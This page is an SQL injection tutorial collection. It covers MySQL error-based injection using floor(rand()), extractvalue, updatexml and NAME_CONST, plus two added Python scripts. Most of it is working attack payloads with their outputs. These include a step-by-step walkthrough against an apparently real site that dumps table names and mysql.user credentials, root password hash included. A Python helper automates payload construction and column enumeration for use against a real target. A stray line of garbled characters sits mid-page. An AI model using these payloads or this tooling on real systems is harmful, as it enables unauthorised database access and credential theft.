1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example. First a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked inside the duplicate key (the trailing 1 is the floor(rand(0)*2) bit, not part of the version string). To read other data, replace version() with the subquery you want evaluated. The trick depends on two facts: floor(rand(0)*2) is deterministic and starts 0, 1, 1, ..., and MySQL evaluates the GROUP BY key once to look it up in the temporary table and again when it inserts a new group, so the third row produces a key that already exists. The derived table therefore needs at least three rows; information_schema.tables has plenty, and Method 2 below builds exactly three with a UNION so that no large table is needed.

For example, to read the administrator's username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

The 0x5c (backslash) prefix makes the XPath expression invalid at its first character, so the injected string is echoed back in the error. Note that the XPath error shows at most 32 characters of the string, so longer values have to be read in pieces with substr().

3. UpdateXml

Test payload:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
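To make the collision behind section 1 concrete, here is an added example (not code from the original post) that reproduces MySQL's RAND(seed) generator and the double evaluation of the GROUP BY key in Python. It assumes the my_rnd() linear congruential generator from the MySQL 5.x source (seed1 = seed*0x10001+55555555, seed2 = seed*0x10000001, modulus 0x3FFFFFFF); MySQLRand, floor_rand_bits and simulate_group_by are names chosen here, and the prefix and row counts are constructed inputs.

```python
import math

MAX_VALUE = 0x3FFFFFFF  # modulus of MySQL's my_rnd() (assumption: 5.x implementation)


class MySQLRand:
    """Reproduces MySQL's RAND(seed) as implemented by randominit()/my_rnd()."""

    def __init__(self, seed: int) -> None:
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE

    def next(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_bits(seed: int, n: int) -> list:
    """The first n values of floor(rand(seed)*2)."""
    rng = MySQLRand(seed)
    return [math.floor(rng.next() * 2) for _ in range(n)]


def simulate_group_by(prefix: str, rows: int, seed: int = 0):
    """Model GROUP BY concat(prefix, floor(rand(seed)*2)) over `rows` source rows.

    The key is computed once to probe the temporary table; if no such group
    exists yet it is computed AGAIN when the new group is inserted, so rand()
    advances twice for a new group. Returns (error_or_None, row_reached).
    """
    rng = MySQLRand(seed)
    groups = {}
    for row in range(1, rows + 1):
        key = prefix + str(math.floor(rng.next() * 2))  # first evaluation: lookup
        if key in groups:
            groups[key] += 1
            continue
        key = prefix + str(math.floor(rng.next() * 2))  # second evaluation: insert
        if key in groups:
            return ("ERROR 1062 (23000): Duplicate entry '%s' for key 'group_key'" % key, row)
        groups[key] = 1
    return (None, rows)


if __name__ == "__main__":
    print("floor(rand(0)*2):", floor_rand_bits(0, 8))
    for rows in (2, 3):
        print(rows, "rows ->", simulate_group_by("5.1.33-community-log", rows))
```

With two source rows the simulation finishes without an error, which is why the UNION in Method 2 carries three rows; with three rows the duplicate key is the one ending in 1, matching the errors shown above.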
" L5 {0 }! `2 r. ~% ^. g
More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Here name_const() names a result column after the value we want to read; joining two derived tables that both expose a column of that name makes MySQL fail with "Duplicate column name", and the error message carries the value.
Error-based injection on newer MySQL versions: exploiting NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

The constant-argument requirement matters in practice: server builds that enforce it reject a function call or subquery as the name argument with "Incorrect arguments to NAME_CONST", so this technique only works where the server still accepts a non-constant name, as the 5.0.27 target below does.
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

The same expression appears twice on purpose: the derived table then has two columns with the same name, which is what raises the error.

MySQL 5.1.3 Server System Variables

Let's try it out on my site...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error Duplicate column name '5.0.27-community-nt'

(version() is a function rather than a system variable; the variable form is @@version, as in the collected example above. Both work the same way here.)
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

DATA is the subquery whose single value you want to read. We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error Duplicate column name '1
Now let's get the table names out.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Each request leaks one value, so step the offset (limit+1,1, limit+2,1, ...) to walk through the remaining tables. Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error Duplicate column name 'com_admanage
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

The table name is passed as a hex literal (below, 0x6d7973716c is 'mysql' and 0x75736572 is 'user'), so the payload needs no quote characters.

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error Duplicate column name 'Host'

Now the final step: pull the data out.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

concat_ws joins the columns with the separator 0x207e20 (" ~ "), so both values come back in a single error. So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
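As an added example (not code from the original post or the tutorial's author), the following Python ties the NAME_CONST procedure above together and also parses the other two error families from the first half of the page: it hex-encodes the schema and table name the way the tutorial does, builds the doubled NAME_CONST payload for successive limit offsets, and recovers the leaked value from the server's error text. The transport is a constructed stand-in (fake_server) that answers the way the 5.0.27 target in the tutorial did; parse_error, Leak, mysql_hex, name_const_payload and enumerate_columns are names chosen here, the 32-character XPath limit and the separator set are assumptions, and SAMPLE_ERRORS are constructed copies of lines shown on this page.

```python
import re
from dataclasses import dataclass
from typing import Callable, Iterator, List, Optional

# Constructed copies of the error lines seen on this page, used as sample input.
SAMPLE_ERRORS = [
    "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    "ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'",
    "Error Duplicate column name '5.0.27-community-nt'",
]

XPATH_MAX = 32        # assumption: MySQL echoes at most 32 chars of the bad XPath
SEPARATORS = "\\:~#"  # prefix bytes such as 0x5c or 0x3a used to force the XPath error

# Patterns for the three error families; the closing quote is optional because
# some pages cut the message off (compare the 'com_admanage line above).
PATTERNS = [
    ("duplicate_entry", re.compile(r"Duplicate entry '(.*)' for key '")),
    ("xpath", re.compile(r"XPATH syntax error: '(.*?)'?$")),
    ("duplicate_column", re.compile(r"Duplicate column name '(.*?)'?$")),
]


@dataclass(frozen=True)
class Leak:
    kind: str
    value: str
    truncated: bool = False


def parse_error(text: str) -> Optional[Leak]:
    """Recover the exfiltrated value from a MySQL error message, or None."""
    text = text.strip()
    for kind, pat in PATTERNS:
        m = pat.search(text)
        if not m:
            continue
        raw = m.group(1)
        if kind == "duplicate_entry":
            # key = value || floor(rand(0)*2); with rand(0) the colliding key is
            # the one ending in '1' (third row), so that last char is not data.
            return Leak(kind, raw[:-1])
        if kind == "xpath":
            truncated = len(raw) >= XPATH_MAX  # longer values need substr() windows
            if raw and raw[0] in SEPARATORS:
                raw = raw[1:]
            return Leak(kind, raw, truncated)
        return Leak(kind, raw)
    return None


def mysql_hex(s: str) -> str:
    """Hex literal for a string, so the payload contains no quote characters."""
    return "0x" + s.encode("utf-8").hex()


def name_const_payload(subquery: str) -> str:
    """Doubled NAME_CONST payload in the tutorial's shape (subquery must yield one value)."""
    sq = subquery.replace(" ", "+")
    return "+and+1=(select+*+from+(select+NAME_CONST((%s),1),NAME_CONST((%s),1))+as+x)--" % (sq, sq)


def enumerate_columns(send: Callable[[str], str], schema: str, table: str,
                      max_columns: int = 64) -> Iterator[str]:
    """Walk limit offsets until the response carries no duplicate-column error."""
    for offset in range(max_columns):
        sq = ("select column_name from information_schema.columns where table_schema=%s "
              "and table_name=%s limit %d,1" % (mysql_hex(schema), mysql_hex(table), offset))
        leak = parse_error(send(name_const_payload(sq)))
        if leak is None or leak.kind != "duplicate_column":
            return  # past the last column, or a server that rejects the call
        yield leak.value


def fake_server(columns: List[str]) -> Callable[[str], str]:
    """Constructed stand-in for the injectable page: one leaked column per offset."""
    def send(payload: str) -> str:
        offset = int(re.search(r"limit\+(\d+),1", payload).group(1))
        if offset < len(columns):
            return "Error Duplicate column name '%s'" % columns[offset]
        return "<html>normal page, no error</html>"
    return send


if __name__ == "__main__":
    for line in SAMPLE_ERRORS:
        print(parse_error(line))
    print(list(enumerate_columns(fake_server(["Host", "User", "Password"]), "mysql", "user")))
```

Against a real target, send would be an HTTP request that appends the payload to the injectable parameter and returns the response body; the parser is deliberately tolerant of the truncated "Error Duplicate column name '..." form the PHP page emits, and flags XPath values that hit the 32-character limit so the caller knows to continue with substr().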
And there we have it, thanks for reading.